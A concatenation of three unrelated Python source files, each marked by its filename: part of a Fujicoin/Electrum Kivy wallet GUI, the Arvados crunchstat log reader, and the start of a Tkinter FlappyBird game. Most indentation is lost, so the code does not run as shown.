assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
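    # Worked example (added comment): with an illustrative rate of 30000 and
    # fiat_amount '15', fiat_to_btc computes
    #   satoshis = int(10**8 * Decimal('15') / Decimal(30000)) = 50000
    # which format_satoshis_plain renders as '0.0005' when the decimal point
    # is 8 (BTC as the base unit).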
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''Screen orientation of the device the app is running on.
    Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read only `AliasProperty`. Defaults to 'landscape'
    '''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read only `AliasProperty`. Defaults to 'phone'
    '''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
App.__init__(self)#, **kwargs)
        self.title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
        # create triggers so as to limit updates to at most twice a second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('fujicoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for fujicoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage):
if storage:
wallet = Wallet(storage)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
storage = WalletStorage(path, manual_upgrades=True)
if not storage.file_exists():
wizard.run('new')
elif storage.is_encrypted():
raise Exception("Kivy GUI does not support encrypted wallet files.")
elif storage.requires_upgrade():
wizard.upgrade_storage(storage)
else:
raise Exception("unexpected storage file situation")
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
        ''' Initialize the UX part of Electrum. This function performs the basic
        tasks of setting up the UI.
        '''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
            Logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
reader.py
|
# Copyright (C) The Arvados Authors. All rights reserved.
#
# SPDX-License-Identifier: AGPL-3.0
import arvados
import itertools
import queue
import threading
from crunchstat_summary import logger
class CollectionReader(object):
def __init__(self, collection_id):
self._collection_id = collection_id
self._label = collection_id
self._readers = []
def __str__(self):
return self._label
def __iter__(self):
logger.debug('load collection %s', self._collection_id)
collection = arvados.collection.CollectionReader(self._collection_id)
filenames = [filename for filename in collection]
# Crunch2 has multiple stats files
if len(filenames) > 1:
filenames = ['crunchstat.txt', 'arv-mount.txt']
for filename in filenames:
try:
self._readers.append(collection.open(filename))
except IOError:
logger.warning('Unable to open %s', filename)
self._label = "{}/{}".format(self._collection_id, filenames[0])
return itertools.chain(*[iter(reader) for reader in self._readers])
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self._readers:
for reader in self._readers:
reader.close()
self._readers = []
class LiveLogReader(object):
EOF = None
def __init__(self, job_uuid):
self.job_uuid = job_uuid
self.event_types = (['stderr'] if '-8i9sb-' in job_uuid else ['crunchstat', 'arv-mount'])
logger.debug('load %s events for job %s', self.event_types, self.job_uuid)
def __str__(self):
return self.job_uuid
def _get_all_pages(self):
got = 0
last_id = 0
filters = [
['object_uuid', '=', self.job_uuid],
['event_type', 'in', self.event_types]]
try:
while True:
page = arvados.api().logs().index(
limit=1000,
order=['id asc'],
filters=filters + [['id','>',str(last_id)]],
select=['id', 'properties'],
).execute(num_retries=2)
got += len(page['items'])
logger.debug(
'%s: received %d of %d log events',
self.job_uuid, got,
got + page['items_available'] - len(page['items']))
for i in page['items']:
for line in i['properties']['text'].split('\n'):
self._queue.put(line+'\n')
last_id = i['id']
if (len(page['items']) == 0 or
len(page['items']) >= page['items_available']):
break
finally:
self._queue.put(self.EOF)
def __iter__(self):
self._queue = queue.Queue()
self._thread = threading.Thread(target=self._get_all_pages)
self._thread.daemon = True
self._thread.start()
return self
def __next__(self):
line = self._queue.get()
if line is self.EOF:
self._thread.join()
raise StopIteration
return line
next = __next__ # for Python 2
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
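# The shape above (a daemon thread fills a Queue and pushes an EOF sentinel
# when the data runs out) is the heart of LiveLogReader. A minimal,
# self-contained sketch of the same pattern, runnable without Arvados:
if __name__ == '__main__':
    def _demo_producer(q):
        for n in range(3):
            q.put('line %d\n' % n)
        q.put(None)  # EOF sentinel: tells the consumer no more data is coming
    _q = queue.Queue()
    _t = threading.Thread(target=_demo_producer, args=(_q,))
    _t.daemon = True
    _t.start()
    for _line in iter(_q.get, None):  # consume until the sentinel appears
        print(_line, end='')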
|
FlappyBird - Windows [3.0.5].py
|
'''
FlappyBird Version 3.0.5 on Windows
'''
#Program for python 3.5
try:
from tkinter import * #needed tkinter module
from tkinter import messagebox, filedialog
import tkinter.ttk as t
except ImportError:
raise ImportError("You need to install tkinter module for python3.5")
from random import randint
import time, sys, os, threading
try:
from playsound import *
except ImportError:
raise ImportError("You need to install playsound module for python3.5")
try: ##### Import local helper modules, raising a clear ImportError if one is missing #####
import GamingIntro
except ImportError:
raise ImportError("Missing file module for this program: \'GamingIntro.py\'") #My module-file
try:
import HighscoreManager
except ImportError:
raise ImportError("Missing file module for this program: \'HighscoreManager.py\'") #My module-file
try:
import FeedbackInterface
except ImportError:
raise ImportError("Missing file module for this program: \'FeedbackInterface.py\'") #My module-file
try:
import Preferences
except ImportError:
raise ImportError("Missing file module for this program: \'Preferences.py\'") #My module-file
try:
from ErrorCase import ErrorManager
except ImportError:
raise ImportError("Missing file module for this program: \'ErrorCase.py\'") #My module-file
# Resolve the current user's home directory (assumes a C:/Users/<name> layout)
user = os.path.abspath("").split(os.sep)[2]
home = "C:/Users/{0}/".format(user)
highscore = 0
if not os.path.isdir(home+".FlappyBird"): #Create data directory on first run
os.mkdir(home+".FlappyBird")
first_time = True
else:
first_time = False
if not os.path.exists(home+".FlappyBird/highscore.txt"):
f = open(home+".FlappyBird/highscore.txt", "w")
f.write(str(highscore))
f.close()
else:
f = open(home+".FlappyBird/highscore.txt", "r")
dt = f.read()
highscore = int(dt)
f.close()
class CollisionZone(): #Collision zone class for development mode
def __init__(self, game, x, y, x1, y1, color="blue"):
self.game = game
self.color = color
self.id = self.game.canvas.create_rectangle(x, y, x1, y1, outline=self.color)
def update(self, x, y, x1, y1):
self.game.canvas.delete(self.id)
self.id = self.game.canvas.create_rectangle(x, y, x1, y1, outline=self.color)
def __del__(self):
self.game.canvas.delete(self.id)
class Game():
def __init__(self, dev=False, directory=""):
self.dev = dev #development mode
self.dir = directory #path location
p = Preferences.Preference(pathinit=home, pt=self.dir)
if p.getData() == {}:
self.preferences_data = {'Kick-Key':'<space>', 'GamingIntro-Init':'0', \
'Bindings':'p;F3;s', 'DevMode':'False', 'Scales':'180;14', "Color":"#00ff00"}
else:
self.preferences_data = p.getData()
self.current_pref = [self.preferences_data['Kick-Key']] + \
self.preferences_data['Bindings'].split(";")
